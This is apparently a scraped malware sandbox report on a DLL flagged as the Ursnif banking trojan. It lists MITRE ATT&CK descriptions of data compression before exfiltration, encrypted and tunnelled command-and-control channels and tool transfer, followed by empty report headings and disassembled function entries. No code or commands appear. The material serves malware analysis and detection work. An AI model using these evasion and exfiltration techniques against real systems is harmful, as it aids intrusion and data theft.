Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report iJdlvBxhYu.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 6E101D6E, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Function 6E101E74, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Function 6E101F56, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6E101C4E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97
memoryCOMMON

Function 6E101367, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 6E101800, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Function 6E10160D, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6E1023A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 6E102184, Relevance: .1, Instructions: 77
COMMONCrypto

Function 6E10195D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Function 6E101879, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON